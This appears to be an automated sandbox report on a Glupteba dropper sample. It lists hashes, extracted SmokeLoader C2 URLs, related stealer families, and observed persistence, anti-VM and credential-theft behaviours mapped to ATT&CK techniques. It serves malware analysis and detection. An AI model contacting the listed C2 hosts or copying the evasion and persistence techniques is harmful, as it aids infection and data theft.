glupteba | b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8

Target

EB7233922891E1DAD0434FBD52623647.exe
Size

7.9MB
MD5

eb7233922891e1dad0434fbd52623647
SHA1

331126b108532ab9a1e932141bff55a38656bce9
SHA256

b39e29c24003441609c457a3455cae9d9fb6f4462f5e06d0c1d317d243711cb8
SHA512

597fbb0f397c45c8a2c5f63893c6d6bd4641e952510dfcac05dadb7afaaf4e005df1261649d4e79951979bad0be1fb09feebac7a6d23c31679590cbf40e1d4ac

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5968-313-0x0000000001750000-0x0000000002076000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXerUNdlL32.eXerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6088	4816	rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1948	4816	rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5700	4816	rundll32.exe

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5856-213-0x0000000004990000-0x00000000049C0000-memory.dmp	family_redline
C:\Users\Admin\Documents\NMtYBWQ61pYznbqVoJMOaC6c.exe	family_redline
C:\Users\Admin\Documents\B9O6bq19rea6BpyKuUJzYQ6Q.exe	family_redline
behavioral2/memory/4692-485-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/5256-514-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/4396-545-0x0000000000000000-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Suspicious use of NtCreateProcessExOtherParentProcess 17 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeGameBoxWin64.exeWerFault.exeexplorer.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 1148 created 6140	1148	WerFault.exe	rundll32.exe
PID 2372 created 5968	2372	WerFault.exe	ys8YRG5UgmpkjNZexReC2Xbd.exe
PID 6532 created 5204	6532	WerFault.exe	explorer.exe
PID 6672 created 2344	6672	WerFault.exe	xEL0UOsp9f5GdO130zgfqNJ8.exe
PID 7012 created 5656	7012	WerFault.exe	fVqhXPVEa95IDkaUhXHBvgdO.exe
PID 5020 created 6024	5020	GameBoxWin64.exe	dSoPTyxhok6cHs2ybW6rnWhT.exe
PID 6360 created 6168	6360	WerFault.exe	w_T2ZpoqCL6IAkXoimhlntEt.exe
PID 7540 created 5768	7540	explorer.exe	rundll32.exe
PID 3116 created 7016	3116	WerFault.exe	askinstall53.exe
PID 888 created 5676	888	WerFault.exe	1470615.exe
PID 6364 created 3488	6364	WerFault.exe	rundll32.exe
PID 7104 created 5916	7104	WerFault.exe	8607405.exe
PID 3992 created 3392	3992	WerFault.exe	F11A.exe
PID 2656 created 3264	2656	WerFault.exe	explorer.exe
PID 5476 created 4476	5476	WerFault.exe	2533838.exe
PID 5404 created 5288	5404	WerFault.exe	5831941.exe
PID 6088 created 6860	6088	WerFault.exe	4700446.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader

evasion 6 IoCs

evasion.

evasion

Processes:

resource	yara_rule
behavioral2/memory/5968-313-0x0000000001750000-0x0000000002076000-memory.dmp	evasion
C:\Users\Admin\Documents\JY94WQQaT7F9U5WW77kIxPEF.exe	evasion
C:\Users\Admin\Documents\y_b0wCZGcPi6yl3YyF3GVSz5.exe	evasion
C:\Users\Admin\Documents\duZ8PiCmHX783JGssa2_JrDB.exe	evasion
C:\Users\Admin\Documents\JY94WQQaT7F9U5WW77kIxPEF.exe	evasion
C:\Users\Admin\Documents\y_b0wCZGcPi6yl3YyF3GVSz5.exe	evasion

suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2344-390-0x0000000004A80000-0x0000000004B1D000-memory.dmp	family_vidar

Blocklisted process makes network request 6 IoCs

Processes:

MsiExec.exe

flow pid process

223 7792 MsiExec.exe
225 7792 MsiExec.exe
226 7792 MsiExec.exe
227 7792 MsiExec.exe
230 7792 MsiExec.exe
232 7792 MsiExec.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

3377047_logo_media.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe

flow	pid	process
223	7792	MsiExec.exe
225	7792	MsiExec.exe
226	7792	MsiExec.exe
227	7792	MsiExec.exe
230	7792	MsiExec.exe
232	7792	MsiExec.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	3377047_logo_media.exe

Executes dropped EXE 64 IoCs

Processes:

KRSetp.exe1470615.exe8746557.exeCleaner Installation.exe8607405.exeFolder.exey_b0wCZGcPi6yl3YyF3GVSz5.exeWinHoster.exeys8YRG5UgmpkjNZexReC2Xbd.exeInstallation.exeuhlMvjiM_cFKqG2sa1Chga1X.exeduZ8PiCmHX783JGssa2_JrDB.exewo2fMrz_7qjffU_x_shlqyk0.exenO03ABkh7hdqIUnSBO69uWWI.exe3rNFvXzLXMlNFCvc32Oqh9Ch.exedSoPTyxhok6cHs2ybW6rnWhT.exesBf7se8pdHa7It2u292JAYsq.exeJY94WQQaT7F9U5WW77kIxPEF.exeXXfonD7r0ujlJOE69vCARQwf.exeB9O6bq19rea6BpyKuUJzYQ6Q.exeexplorer.exexEL0UOsp9f5GdO130zgfqNJ8.exeOwOf1A4hkWQqEkrB13_paZa8.exefVqhXPVEa95IDkaUhXHBvgdO.exew_T2ZpoqCL6IAkXoimhlntEt.exeNMtYBWQ61pYznbqVoJMOaC6c.exeS47rYlKP5jCrGkLBNX4aJRHK.exeAzRQxmcTqX_2X8NQkYpru4an.exeys8YRG5UgmpkjNZexReC2Xbd.exenO03ABkh7hdqIUnSBO69uWWI.execustomer3.exemd8_8eus.exebodlAh1CVSDV9qX9YyeSQ3yC.exejooyu.exe2533838.exebodlAh1CVSDV9qX9YyeSQ3yC.tmp4628016.exeGameBox64bit.exeduZ8PiCmHX783JGssa2_JrDB.exe6442635.exe5413231.exe11111.exeJY94WQQaT7F9U5WW77kIxPEF.exe5831941.exey_b0wCZGcPi6yl3YyF3GVSz5.exejfiag3g_gg.exe7315424.exe11111.exe11111.exe11111.exemd9_1sjm.exe11111.exe11111.exe11111.exejfiag3g_gg.exeSetup.exeGameBox64bit.exeVersiumresearch.exeMediaBurner2.exeWerFault.exezhangfei.exe

pid	process
3696	KRSetp.exe
5676	1470615.exe
5772	8746557.exe
5856	Cleaner Installation.exe
5916	8607405.exe
5528	Folder.exe
2420	y_b0wCZGcPi6yl3YyF3GVSz5.exe
2444	WinHoster.exe
5968	ys8YRG5UgmpkjNZexReC2Xbd.exe
1172	Installation.exe
3720	uhlMvjiM_cFKqG2sa1Chga1X.exe
3700	duZ8PiCmHX783JGssa2_JrDB.exe
5924	wo2fMrz_7qjffU_x_shlqyk0.exe
2420	y_b0wCZGcPi6yl3YyF3GVSz5.exe
5328	nO03ABkh7hdqIUnSBO69uWWI.exe
5968	ys8YRG5UgmpkjNZexReC2Xbd.exe
496	3rNFvXzLXMlNFCvc32Oqh9Ch.exe
6024	dSoPTyxhok6cHs2ybW6rnWhT.exe
5552	sBf7se8pdHa7It2u292JAYsq.exe
5612	JY94WQQaT7F9U5WW77kIxPEF.exe
5636	XXfonD7r0ujlJOE69vCARQwf.exe
5748	B9O6bq19rea6BpyKuUJzYQ6Q.exe
5204	explorer.exe
2344	xEL0UOsp9f5GdO130zgfqNJ8.exe
4136	OwOf1A4hkWQqEkrB13_paZa8.exe
5656	fVqhXPVEa95IDkaUhXHBvgdO.exe
6168	w_T2ZpoqCL6IAkXoimhlntEt.exe
6504	NMtYBWQ61pYznbqVoJMOaC6c.exe
6888	S47rYlKP5jCrGkLBNX4aJRHK.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
6840	ys8YRG5UgmpkjNZexReC2Xbd.exe
6740	nO03ABkh7hdqIUnSBO69uWWI.exe
4808	customer3.exe
6512	md8_8eus.exe
6560	bodlAh1CVSDV9qX9YyeSQ3yC.exe
3540	jooyu.exe
4476	2533838.exe
4512	bodlAh1CVSDV9qX9YyeSQ3yC.tmp
5076	4628016.exe
5828	GameBox64bit.exe
4692	duZ8PiCmHX783JGssa2_JrDB.exe
2940	6442635.exe
7036	5413231.exe
4700	11111.exe
5256	JY94WQQaT7F9U5WW77kIxPEF.exe
5288	5831941.exe
4396	y_b0wCZGcPi6yl3YyF3GVSz5.exe
6316	jfiag3g_gg.exe
5972	7315424.exe
6224	11111.exe
7024	11111.exe
1852	11111.exe
5284	md9_1sjm.exe
3924	11111.exe
6612	11111.exe
6044	11111.exe
1904	jfiag3g_gg.exe
3168	Setup.exe
4912	GameBox64bit.exe
5856	Cleaner Installation.exe
5500	Versiumresearch.exe
5736	MediaBurner2.exe
6088	WerFault.exe
5952	zhangfei.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EA15.exeB9O6bq19rea6BpyKuUJzYQ6Q.exeNMtYBWQ61pYznbqVoJMOaC6c.exeDDCF.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	EA15.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	B9O6bq19rea6BpyKuUJzYQ6Q.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	B9O6bq19rea6BpyKuUJzYQ6Q.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NMtYBWQ61pYznbqVoJMOaC6c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NMtYBWQ61pYznbqVoJMOaC6c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DDCF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DDCF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	EA15.exe

Drops startup file 2 IoCs

Processes:

customer3.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe	customer3.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe	customer3.exe

Loads dropped DLL 53 IoCs

Processes:

rundll32.exeAzRQxmcTqX_2X8NQkYpru4an.exebodlAh1CVSDV9qX9YyeSQ3yC.tmpCleaner Installation.exeMediaBurner2.tmpGameBoxWin64.exeWeather Installation.exerundll32.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeinstaller.exeMsiExec.exerundll32.exeWeather_Installation.exeWeather.exe

pid	process
6140	rundll32.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
4512	bodlAh1CVSDV9qX9YyeSQ3yC.tmp
4512	bodlAh1CVSDV9qX9YyeSQ3yC.tmp
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
5856	Cleaner Installation.exe
2544	MediaBurner2.tmp
5020	GameBoxWin64.exe
5020	GameBoxWin64.exe
6808	Weather Installation.exe
5768	rundll32.exe
5020	GameBoxWin64.exe
7840	MsiExec.exe
7840	MsiExec.exe
7604	MsiExec.exe
7604	MsiExec.exe
7604	MsiExec.exe
1968	MsiExec.exe
1968	MsiExec.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
7792	MsiExec.exe
7792	MsiExec.exe
7792	MsiExec.exe
7792	MsiExec.exe
7792	MsiExec.exe
7792	MsiExec.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
7792	MsiExec.exe
7792	MsiExec.exe
7792	MsiExec.exe
7792	MsiExec.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
6488	installer.exe
6488	installer.exe
6488	installer.exe
7500	MsiExec.exe
7500	MsiExec.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
3488	rundll32.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
7060	AzRQxmcTqX_2X8NQkYpru4an.exe
7420	Weather_Installation.exe
7420	Weather_Installation.exe
7420	Weather_Installation.exe
7420	Weather_Installation.exe
7420	Weather_Installation.exe
2500	Weather.exe
7420	Weather_Installation.exe
2500	Weather.exe
2500	Weather.exe
7420	Weather_Installation.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\NMtYBWQ61pYznbqVoJMOaC6c.exe	themida
C:\Users\Admin\Documents\B9O6bq19rea6BpyKuUJzYQ6Q.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

8746557.exemsedge.exe3377047_logo_media.exeaipackagechainer.exeWeather_Installation.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	8746557.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5"	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Rivorojihe.exe\""	3377047_logo_media.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run	aipackagechainer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\	aipackagechainer.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	Weather_Installation.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --gVNB"	Weather_Installation.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery
T1063

Processes:

powershell.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

DDCF.exeEA15.exeNMtYBWQ61pYznbqVoJMOaC6c.exeB9O6bq19rea6BpyKuUJzYQ6Q.exemd8_8eus.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	DDCF.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	EA15.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	NMtYBWQ61pYznbqVoJMOaC6c.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	B9O6bq19rea6BpyKuUJzYQ6Q.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md8_8eus.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

GameBoxWin64.exemsiexec.exeWeather Installation.exeCleaner Installation.exeinstaller.exe

description	ioc	process
File opened (read-only)	\??\N:	GameBoxWin64.exe
File opened (read-only)	\??\Y:	GameBoxWin64.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\R:	Weather Installation.exe
File opened (read-only)	\??\U:	Weather Installation.exe
File opened (read-only)	\??\J:	GameBoxWin64.exe
File opened (read-only)	\??\Q:	Cleaner Installation.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	Cleaner Installation.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\I:	Cleaner Installation.exe
File opened (read-only)	\??\W:	Weather Installation.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\S:	GameBoxWin64.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\J:	Cleaner Installation.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\X:	Weather Installation.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	Cleaner Installation.exe
File opened (read-only)	\??\M:	Cleaner Installation.exe
File opened (read-only)	\??\Z:	Cleaner Installation.exe
File opened (read-only)	\??\T:	GameBoxWin64.exe
File opened (read-only)	\??\P:	Weather Installation.exe
File opened (read-only)	\??\L:	Cleaner Installation.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\V:	Weather Installation.exe
File opened (read-only)	\??\E:	Cleaner Installation.exe
File opened (read-only)	\??\E:	Weather Installation.exe
File opened (read-only)	\??\K:	GameBoxWin64.exe
File opened (read-only)	\??\Q:	GameBoxWin64.exe
File opened (read-only)	\??\W:	GameBoxWin64.exe
File opened (read-only)	\??\S:	Weather Installation.exe
File opened (read-only)	\??\H:	Cleaner Installation.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\A:	GameBoxWin64.exe
File opened (read-only)	\??\G:	Weather Installation.exe
File opened (read-only)	\??\K:	Cleaner Installation.exe
File opened (read-only)	\??\A:	Weather Installation.exe
File opened (read-only)	\??\N:	Cleaner Installation.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\G:	Cleaner Installation.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	Weather Installation.exe
File opened (read-only)	\??\U:	GameBoxWin64.exe
File opened (read-only)	\??\L:	Weather Installation.exe
File opened (read-only)	\??\T:	Cleaner Installation.exe
File opened (read-only)	\??\W:	Cleaner Installation.exe
File opened (read-only)	\??\Y:	Cleaner Installation.exe
File opened (read-only)	\??\F:	Weather Installation.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	Cleaner Installation.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\V:	GameBoxWin64.exe
File opened (read-only)	\??\H:	GameBoxWin64.exe
File opened (read-only)	\??\U:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

137 ipinfo.io
221 ip-api.com
16 ipinfo.io
54 ipinfo.io
72 ipinfo.io
75 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

B9O6bq19rea6BpyKuUJzYQ6Q.exeNMtYBWQ61pYznbqVoJMOaC6c.exeDDCF.exeEA15.exe

pid process

5748 B9O6bq19rea6BpyKuUJzYQ6Q.exe
6504 NMtYBWQ61pYznbqVoJMOaC6c.exe
1180 DDCF.exe
420 EA15.exe

flow	ioc
137	ipinfo.io
221	ip-api.com
16	ipinfo.io
54	ipinfo.io
72	ipinfo.io
75	ip-api.com

pid	process
5748	B9O6bq19rea6BpyKuUJzYQ6Q.exe
6504	NMtYBWQ61pYznbqVoJMOaC6c.exe
1180	DDCF.exe
420	EA15.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

ys8YRG5UgmpkjNZexReC2Xbd.exenO03ABkh7hdqIUnSBO69uWWI.exeduZ8PiCmHX783JGssa2_JrDB.exeJY94WQQaT7F9U5WW77kIxPEF.exey_b0wCZGcPi6yl3YyF3GVSz5.exeGameBox64bit.exeXXfonD7r0ujlJOE69vCARQwf.exesBf7se8pdHa7It2u292JAYsq.exe

description	pid	process	target process
PID 5968 set thread context of 6840	5968	ys8YRG5UgmpkjNZexReC2Xbd.exe	ys8YRG5UgmpkjNZexReC2Xbd.exe
PID 5328 set thread context of 6740	5328	nO03ABkh7hdqIUnSBO69uWWI.exe	nO03ABkh7hdqIUnSBO69uWWI.exe
PID 3700 set thread context of 4692	3700	duZ8PiCmHX783JGssa2_JrDB.exe	duZ8PiCmHX783JGssa2_JrDB.exe
PID 5612 set thread context of 5256	5612	JY94WQQaT7F9U5WW77kIxPEF.exe	JY94WQQaT7F9U5WW77kIxPEF.exe
PID 2420 set thread context of 4396	2420	y_b0wCZGcPi6yl3YyF3GVSz5.exe	y_b0wCZGcPi6yl3YyF3GVSz5.exe
PID 4912 set thread context of 5828	4912	GameBox64bit.exe	GameBox64bit.exe
PID 5636 set thread context of 804	5636	XXfonD7r0ujlJOE69vCARQwf.exe	XXfonD7r0ujlJOE69vCARQwf.exe
PID 5552 set thread context of 6256	5552	sBf7se8pdHa7It2u292JAYsq.exe	sBf7se8pdHa7It2u292JAYsq.exe

Drops file in Program Files directory 64 IoCs

Processes:

AzRQxmcTqX_2X8NQkYpru4an.exeSetup.exe3rNFvXzLXMlNFCvc32Oqh9Ch.exeultramediaburner.tmp

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe	Setup.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	3rNFvXzLXMlNFCvc32Oqh9Ch.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini	Setup.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe	Setup.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\extensions\VLSub.luac	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
